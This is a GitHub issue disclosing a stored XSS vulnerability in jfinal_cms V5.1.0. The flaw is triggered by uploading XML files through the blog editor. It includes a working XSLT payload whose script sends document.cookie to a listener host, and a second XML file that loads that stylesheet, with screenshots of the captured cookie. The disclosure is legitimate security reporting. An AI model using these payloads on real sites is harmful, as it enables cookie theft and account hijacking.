xml file upload to XSS vulnerability in jfinal_cms V5.1.0

The code allows uploading XML files by default.

<img width="1920" height="1020" alt="Image" src="https://github.com/user-attachments/assets/2fbbb006-ecf5-499c-bf7b-4cec183de529" />

After logging in, upload files in the blog posting section.

<img width="1889" height="929" alt="Image" src="https://github.com/user-attachments/assets/70920438-8e77-4ffb-94fb-98da505d7594" />
upload xml1

`<?xml version="1.0" encoding="iso-8859-1"?>`
`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">`
`<xsl:template match="/">`
`<html><body>`
`<script>location.href = "http://127.0.0.1:8089?cookie=" + document.cookie;</script>`
`</body></html>`
`</xsl:template>`
`</xsl:stylesheet>`

<img width="1788" height="655" alt="Image" src="https://github.com/user-attachments/assets/ca671a0e-47f2-4dae-b054-50c52e828256" />
upload xml2

`<?xml version="1.0" encoding="iso-8859-1"?>`
`<?xml-stylesheet type="text/xsl"`
`href="http://192.168.73.1:8081/jflyfox/bbs/ueditor/file/20250918/20250918_192947_989256.xml"?>`
`<test></test>`

<img width="1689" height="570" alt="Image" src="https://github.com/user-attachments/assets/652fc984-2bd3-40b4-ae71-f1c19a712130" />
ask xml2 file,get cookie

<img width="1292" height="61" alt="Image" src="https://github.com/user-attachments/assets/15d2f39f-80e0-4425-b751-2acfa01ecba8" />

<img width="1192" height="85" alt="Image" src="https://github.com/user-attachments/assets/579b16a5-03ce-4691-a4d7-9b204e3e284c" />


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

xml file upload to XSS vulnerability in jfinal_cms V5.1.0 #61

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

xml file upload to XSS vulnerability in jfinal_cms V5.1.0 #61

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions